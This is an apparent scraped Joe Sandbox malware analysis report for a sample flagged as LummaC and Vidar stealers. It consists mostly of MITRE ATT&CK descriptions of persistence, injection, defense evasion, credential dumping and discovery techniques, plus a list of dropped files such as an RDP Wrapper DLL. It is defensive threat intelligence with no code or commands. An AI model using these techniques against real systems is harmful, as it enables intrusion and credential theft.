Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\RDP Wrapper\rdpwrap.dll

C:\Program Files\RDP Wrapper\rdpwrap.ini

C:\ProgramData\EBAAFCAFCB.exe

C:\ProgramData\EBAAFCAFCBKF\AKEBFC

C:\ProgramData\EBAAFCAFCBKF\BAECFH

C:\ProgramData\EBAAFCAFCBKF\DBGHDG

C:\ProgramData\EBAAFCAFCBKF\ECBGIE

Windows Analysis Report
file.exe

**\Device\Mup\045012*\MAILSLOT\NET\NETLOGON**

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre